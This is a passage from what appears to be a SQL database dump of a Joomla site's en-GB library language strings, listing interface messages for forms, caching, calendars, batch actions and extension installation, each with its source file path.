open.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1585,'JLIB_FILESYSTEM_ERROR_STREAMS_FILENAME','File name not set.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1586,'JLIB_FILESYSTEM_ERROR_NO_DATA_WRITTEN','Warning: No data written.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1587,'JLIB_FILESYSTEM_ERROR_STREAMS_FAILED_TO_OPEN_WRITER','Failed to open writer: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1588,'JLIB_FILESYSTEM_ERROR_STREAMS_FAILED_TO_OPEN_READER','Failed to open reader: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1589,'JLIB_FILESYSTEM_ERROR_STREAMS_NOT_UPLOADED_FILE','Not an uploaded file!','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1590,'JLIB_FILTER_PARAMS_ALNUM','Alpha Numeric','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1591,'JLIB_FILTER_PARAMS_FLOAT','Float','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1592,'JLIB_FILTER_PARAMS_INTEGER','Integer','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1593,'JLIB_FILTER_PARAMS_RAW','Raw','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1594,'JLIB_FILTER_PARAMS_SAFEHTML','Safe HTML','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1595,'JLIB_FILTER_PARAMS_TEL','Telephone','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1596,'JLIB_FILTER_PARAMS_TEXT','Text','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1597,'JLIB_FORM_BUTTON_CLEAR','Clear','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1598,'JLIB_FORM_BUTTON_SELECT','Select','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1599,'JLIB_FORM_CHANGE_IMAGE','Change Image','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1600,'JLIB_FORM_CHANGE_IMAGE_BUTTON','Change Image Button','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1601,'JLIB_FORM_CHANGE_USER','Select User','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1602,'JLIB_FORM_ERROR_FIELDS_CATEGORY_ERROR_EXTENSION_EMPTY','Extension attribute is empty in the category field.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1603,'JLIB_FORM_ERROR_FIELDS_GROUPEDLIST_ELEMENT_NAME','Unknown element type: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1604,'JLIB_FORM_ERROR_NO_DATA','No data.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1605,'JLIB_FORM_ERROR_VALIDATE_FIELD','Invalid xml field.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1606,'JLIB_FORM_ERROR_XML_FILE_DID_NOT_LOAD','XML file did not load.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1607,'JLIB_FORM_FIELD_INVALID','Invalid field: ','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1608,'JLIB_FORM_INPUTMODE','latin','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1609,'JLIB_FORM_INVALID_FORM_OBJECT','Invalid Form Object: :%s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1610,'JLIB_FORM_INVALID_FORM_RULE','Invalid Form Rule: :%s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1611,'JLIB_FORM_MEDIA_PREVIEW_ALT','Selected image.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1612,'JLIB_FORM_MEDIA_PREVIEW_EMPTY','No image selected.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1613,'JLIB_FORM_MEDIA_PREVIEW_SELECTED_IMAGE','Selected image.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1614,'JLIB_FORM_MEDIA_PREVIEW_TIP_TITLE','Preview','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1615,'JLIB_FORM_SELECT_USER','Select a User','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1616,'JLIB_FORM_VALIDATE_FIELD_INVALID','Invalid field: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1617,'JLIB_FORM_VALIDATE_FIELD_REQUIRED','Field required: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1618,'JLIB_FORM_VALIDATE_FIELD_RULE_MISSING','Validation Rule missing: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1619,'JLIB_FORM_VALIDATE_FIELD_URL_SCHEMA_MISSING','Invalid URL: URL schema is missing in %1$s. Please add one of the following at the beginning: %2$s.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1620,'JLIB_FORM_VALUE_CACHE_APC','Alternative PHP Cache','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1621,'JLIB_FORM_VALUE_CACHE_APCU','APC User Cache','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1622,'JLIB_FORM_VALUE_CACHE_CACHELITE','Cache_Lite','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1623,'JLIB_FORM_VALUE_CACHE_EACCELERATOR','eAccelerator','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1624,'JLIB_FORM_VALUE_CACHE_FILE','File','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1625,'JLIB_FORM_VALUE_CACHE_MEMCACHE','Memcache','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1626,'JLIB_FORM_VALUE_CACHE_MEMCACHED','Memcached (Experimental)','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1627,'JLIB_FORM_VALUE_CACHE_REDIS','Redis','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1628,'JLIB_FORM_VALUE_CACHE_WINCACHE','Windows Cache','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1629,'JLIB_FORM_VALUE_CACHE_XCACHE','XCache','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1630,'JLIB_FORM_VALUE_SESSION_APC','Alternative PHP Cache','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1631,'JLIB_FORM_VALUE_SESSION_APCU','APC User Cache','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1632,'JLIB_FORM_VALUE_SESSION_DATABASE','Database','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1633,'JLIB_FORM_VALUE_SESSION_EACCELERATOR','eAccelerator','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1634,'JLIB_FORM_VALUE_SESSION_MEMCACHE','Memcache','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1635,'JLIB_FORM_VALUE_SESSION_MEMCACHED','Memcached (Experimental)','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1636,'JLIB_FORM_VALUE_SESSION_NONE','PHP','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1637,'JLIB_FORM_VALUE_SESSION_REDIS','Redis','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1638,'JLIB_FORM_VALUE_SESSION_WINCACHE','Windows Cache','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1639,'JLIB_FORM_VALUE_SESSION_XCACHE','XCache','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1640,'JLIB_FORM_VALUE_TIMEZONE_UTC','Universal Time, Coordinated (UTC)','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1641,'JLIB_FORM_VALUE_FROM_TEMPLATE','From Template','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1642,'JLIB_FORM_VALUE_INHERITED','Inherited','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1643,'JLIB_HTML_ACCESS_MODIFY_DESC_CAPTION_ACL','ACL','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1644,'JLIB_HTML_ACCESS_MODIFY_DESC_CAPTION_TABLE','Table','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1645,'JLIB_HTML_ACCESS_SUMMARY_DESC_CAPTION','ACL Summary Table','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1646,'JLIB_HTML_ACCESS_SUMMARY_DESC','Shown below is an overview of the permission settings for this article. Select the tabs above to customise these settings by action.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1647,'JLIB_HTML_ACCESS_SUMMARY','Summary.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1648,'JLIB_HTML_ADD_TO_ROOT','Add to root.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1649,'JLIB_HTML_ADD_TO_THIS_MENU','Add to this menu.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1650,'JLIB_HTML_BATCH_ACCESS_LABEL','Set Access Level','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1651,'JLIB_HTML_BATCH_ACCESS_LABEL_DESC','Not making a selection will keep the original access levels when processing.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1652,'JLIB_HTML_BATCH_COPY','Copy','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1653,'JLIB_HTML_BATCH_FLIPORDERING_LABEL','Reverse the ordering of all articles in the selected categories','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1654,'JLIB_HTML_BATCH_LANGUAGE_LABEL','Set Language','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1655,'JLIB_HTML_BATCH_LANGUAGE_LABEL_DESC','Not making a selection will keep the original language when processing.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1656,'JLIB_HTML_BATCH_LANGUAGE_NOCHANGE','- Keep original Language -','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1657,'JLIB_HTML_BATCH_MENU_LABEL','To Move or Copy your selection please select a Category.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1658,'JLIB_HTML_BATCH_MOVE','Move','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1659,'JLIB_HTML_BATCH_MOVE_QUESTION','Do you want to move the items or make a copy of them?','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1660,'JLIB_HTML_BATCH_NO_CATEGORY','- Don\'t move or copy -','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1661,'JLIB_HTML_BATCH_NOCHANGE','- Keep original Access Levels -','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1662,'JLIB_HTML_BATCH_TAG_LABEL','Add Tag','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1663,'JLIB_HTML_BATCH_TAG_LABEL_DESC','Add a tag to selected items.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1664,'JLIB_HTML_BATCH_TAG_NOCHANGE','- Keep original Tags -','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1665,'JLIB_HTML_BATCH_USER_LABEL','Set User.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1666,'JLIB_HTML_BATCH_USER_LABEL_DESC','Not making a selection will keep the original user when processing.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1667,'JLIB_HTML_BATCH_USER_NOCHANGE','- Keep original User -','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1668,'JLIB_HTML_BATCH_USER_NOUSER','No User.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1669,'JLIB_HTML_BEHAVIOR_ABOUT_THE_CALENDAR','About the Calendar','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1670,'JLIB_HTML_BEHAVIOR_CLOSE','Close','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1671,'JLIB_HTML_BEHAVIOR_DATE_SELECTION','Date selection:\\n','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1672,'JLIB_HTML_BEHAVIOR_DISPLAY_S_FIRST','Display %s first','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1673,'JLIB_HTML_BEHAVIOR_DRAG_TO_MOVE','Drag to move.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1674,'JLIB_HTML_BEHAVIOR_GO_TODAY','Go to today','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1675,'JLIB_HTML_BEHAVIOR_GREEN','Green','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1676,'JLIB_HTML_BEHAVIOR_HOLD_MOUSE','- Hold mouse button on any of the buttons above for faster selection.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1677,'JLIB_HTML_BEHAVIOR_MONTH_SELECT','- Use the < and > buttons to select month\\n','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1678,'JLIB_HTML_BEHAVIOR_NEXT_MONTH_HOLD_FOR_MENU','Select to move to the next month. Select and hold for a list of the months.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1679,'JLIB_HTML_BEHAVIOR_NEXT_YEAR_HOLD_FOR_MENU','Select to move to the next year. Select and hold for a list of years.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1680,'JLIB_HTML_BEHAVIOR_OPEN_CALENDAR','Open the calendar','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1681,'JLIB_HTML_BEHAVIOR_PREV_MONTH_HOLD_FOR_MENU','Select to move to the previous month. Select and hold for a list of the months.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1682,'JLIB_HTML_BEHAVIOR_PREV_YEAR_HOLD_FOR_MENU','Select to move to the previous year. Select and hold for a list of years.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1683,'JLIB_HTML_BEHAVIOR_SELECT_DATE','Select a date.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1684,'JLIB_HTML_BEHAVIOR_SHIFT_CLICK_OR_DRAG_TO_CHANGE_VALUE','(Shift-)Select or Drag to change the value.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1685,'JLIB_HTML_BEHAVIOR_TIME','Time:','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1686,'JLIB_HTML_BEHAVIOR_TODAY','Today','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1687,'JLIB_HTML_BEHAVIOR_TT_DATE_FORMAT','%a, %b %e','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1688,'JLIB_HTML_BEHAVIOR_WK','wk','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1689,'JLIB_HTML_BEHAVIOR_YEAR_SELECT','- Use the « and » buttons to select year\\n','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1690,'JLIB_HTML_BUTTON_BASE_CLASS','Could not load button base class.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1691,'JLIB_HTML_BUTTON_NO_LOAD','Could not load button %s (%s);','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1692,'JLIB_HTML_BUTTON_NOT_DEFINED','Button not defined for type = %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1693,'JLIB_HTML_CALENDAR','Calendar','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1694,'JLIB_HTML_CHECKED_OUT','Checked out','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1695,'JLIB_HTML_CHECKIN','Check-in','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1696,'JLIB_HTML_CLOAKING','This email address is being protected from spambots. You need JavaScript enabled to view it.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1697,'JLIB_HTML_DATE_RELATIVE_DAYS','%s days ago.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1698,'JLIB_HTML_DATE_RELATIVE_DAYS_1','%s day ago.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1699,'JLIB_HTML_DATE_RELATIVE_DAYS_0','%s days ago.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1700,'JLIB_HTML_DATE_RELATIVE_HOURS','%s hours ago.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1701,'JLIB_HTML_DATE_RELATIVE_HOURS_1','%s hour ago.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1702,'JLIB_HTML_DATE_RELATIVE_HOURS_0','%s hours ago.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1703,'JLIB_HTML_DATE_RELATIVE_LESSTHANAMINUTE','Less than a minute ago.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1704,'JLIB_HTML_DATE_RELATIVE_MINUTES','%s minutes ago.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1705,'JLIB_HTML_DATE_RELATIVE_MINUTES_1','%s minute ago.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1706,'JLIB_HTML_DATE_RELATIVE_MINUTES_0','%s minutes ago.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1707,'JLIB_HTML_DATE_RELATIVE_WEEKS','%s weeks ago.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1708,'JLIB_HTML_DATE_RELATIVE_WEEKS_1','%s week ago.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1709,'JLIB_HTML_DATE_RELATIVE_WEEKS_0','%s weeks ago.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1710,'JLIB_HTML_EDIT_MENU_ITEM','Edit menu item.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1711,'JLIB_HTML_EDIT_MENU_ITEM_ID','Item ID: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1712,'JLIB_HTML_EDIT_MODULE','Edit module','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1713,'JLIB_HTML_EDIT_MODULE_IN_POSITION','Position: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1714,'JLIB_HTML_EDITOR_CANNOT_LOAD','Can\'t load the editor.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1715,'JLIB_HTML_END','End','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1716,'JLIB_HTML_ERROR_FUNCTION_NOT_SUPPORTED','Function not supported.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1717,'JLIB_HTML_ERROR_NOTFOUNDINFILE','%s: :%s not found in file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1718,'JLIB_HTML_ERROR_NOTSUPPORTED_NOFILE','%s: :%s not supported. File not found.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1719,'JLIB_HTML_ERROR_NOTSUPPORTED','%s: :%s not supported.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1720,'JLIB_HTML_GOTO_PAGE','Go to page %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1721,'JLIB_HTML_GOTO_POSITION','Go to %s page','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1722,'JLIB_HTML_MOVE_DOWN','Move Down','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1723,'JLIB_HTML_MOVE_UP','Move Up','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1724,'JLIB_HTML_NO_PARAMETERS_FOR_THIS_ITEM','There are no parameters for this item.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1725,'JLIB_HTML_NO_RECORDS_FOUND','No records found.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1726,'JLIB_HTML_PAGE_CURRENT','Page %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1727,'JLIB_HTML_PAGE_CURRENT_OF_TOTAL','Page %s of %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1728,'JLIB_HTML_PAGINATION','Pagination','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1729,'JLIB_HTML_PLEASE_MAKE_A_SELECTION_FROM_THE_LIST','Please first make a selection from the list.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1730,'JLIB_HTML_PUBLISH_ITEM','Publish Item','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1731,'JLIB_HTML_PUBLISHED_EXPIRED_ITEM','Published, but has Expired.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1732,'JLIB_HTML_PUBLISHED_FINISHED','Finish: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1733,'JLIB_HTML_PUBLISHED_ITEM','Published and is Current.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1734,'JLIB_HTML_PUBLISHED_PENDING_ITEM','Published, but is Pending.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1735,'JLIB_HTML_PUBLISHED_START','Start: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1736,'JLIB_HTML_RESULTS_OF','Results %s - %s of %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1737,'JLIB_HTML_SAVE_ORDER','Save Order','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1738,'JLIB_HTML_SELECT_STATE','Select State','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1739,'JLIB_HTML_START','Start','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1740,'JLIB_HTML_UNPUBLISH_ITEM','Unpublish Item','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1741,'JLIB_HTML_VIEW_ALL','View All','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1742,'JLIB_HTML_SETDEFAULT_ITEM','Set default','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1743,'JLIB_HTML_UNSETDEFAULT_ITEM','Unset default','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1744,'JLIB_INSTALLER_ABORT','Aborting language installation: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1745,'JLIB_INSTALLER_ABORT_ALREADYINSTALLED','Extension is already installed.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1746,'JLIB_INSTALLER_ABORT_ALREADY_EXISTS','Extension %1$s: Extension %2$s already exists.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1747,'JLIB_INSTALLER_ABORT_COMP_BUILDADMINMENUS_FAILED','Error building Administrator Menus.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1748,'JLIB_INSTALLER_ABORT_COMP_COPY_MANIFEST','Component %1$s: Could not copy PHP manifest file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1749,'JLIB_INSTALLER_ABORT_COMP_COPY_SETUP','Component %1$s: Could not copy setup file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1750,'JLIB_INSTALLER_ABORT_COMP_FAIL_ADMIN_FILES','Component %s: Failed to copy administrator files.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1751,'JLIB_INSTALLER_ABORT_COMP_FAIL_SITE_FILES','Component %s: Failed to copy site files.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1752,'JLIB_INSTALLER_ABORT_COMP_INSTALL_COPY_SETUP','Component Install: Could not copy setup file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1753,'JLIB_INSTALLER_ABORT_COMP_INSTALL_CUSTOM_INSTALL_FAILURE','Component Install: Custom install routine failure.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1754,'JLIB_INSTALLER_ABORT_COMP_INSTALL_MANIFEST','Component Install: Could not copy PHP manifest file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1755,'JLIB_INSTALLER_ABORT_COMP_INSTALL_PHP_INSTALL','Component Install: Could not copy PHP install file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1756,'JLIB_INSTALLER_ABORT_COMP_INSTALL_PHP_UNINSTALL','Component Install: Could not copy PHP uninstall file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1757,'JLIB_INSTALLER_ABORT_COMP_INSTALL_ROLLBACK','Component Install: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1758,'JLIB_INSTALLER_ABORT_COMP_INSTALL_SQL_ERROR','Component Install: SQL error file %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1759,'JLIB_INSTALLER_ABORT_COMP_UPDATESITEMENUS_FAILED','Component Install: Failed to update menu items.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1760,'JLIB_INSTALLER_ABORT_COMP_UPDATE_ADMIN_ELEMENT','Component Update: The XML file did not have an administration element.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1761,'JLIB_INSTALLER_ABORT_COMP_UPDATE_COPY_SETUP','Component Update: Could not copy setup file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1762,'JLIB_INSTALLER_ABORT_COMP_UPDATE_MANIFEST','Component Update: Could not copy PHP manifest file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1763,'JLIB_INSTALLER_ABORT_COMP_UPDATE_PHP_INSTALL','Component Update: Could not copy PHP install file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1764,'JLIB_INSTALLER_ABORT_COMP_UPDATE_PHP_UNINSTALL','Component Update: Could not copy PHP uninstall file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1765,'JLIB_INSTALLER_ABORT_COMP_UPDATE_ROLLBACK','Component Update: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1766,'JLIB_INSTALLER_ABORT_COMP_UPDATE_SQL_ERROR','Component Update: SQL error file %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1767,'JLIB_INSTALLER_ABORT_CREATE_DIRECTORY','Extension %1$s: Failed to create folder: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1768,'JLIB_INSTALLER_ABORT_DEBUG','Installation unexpectedly stopped:','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1769,'JLIB_INSTALLER_ABORT_DETECTMANIFEST','Unable to detect manifest file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1770,'JLIB_INSTALLER_ABORT_DIRECTORY','Extension %1$s: Another %2$s is already using the named folder: %3$s. Are you trying to install the same extension again?','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1771,'JLIB_INSTALLER_ABORT_ERROR_DELETING_EXTENSIONS_RECORD','Could not delete the extension\'s record from the database.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1772,'JLIB_INSTALLER_ABORT_EXTENSIONNOTVALID','Extension is not valid.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1773,'JLIB_INSTALLER_ABORT_FILE_INSTALL_COPY_SETUP','Files Install: Could not copy setup file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1774,'JLIB_INSTALLER_ABORT_FILE_INSTALL_CUSTOM_INSTALL_FAILURE','Files Install: Custom install routine failure.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1775,'JLIB_INSTALLER_ABORT_FILE_INSTALL_FAIL_SOURCE_DIRECTORY','Files Install: Failed to find source folder: 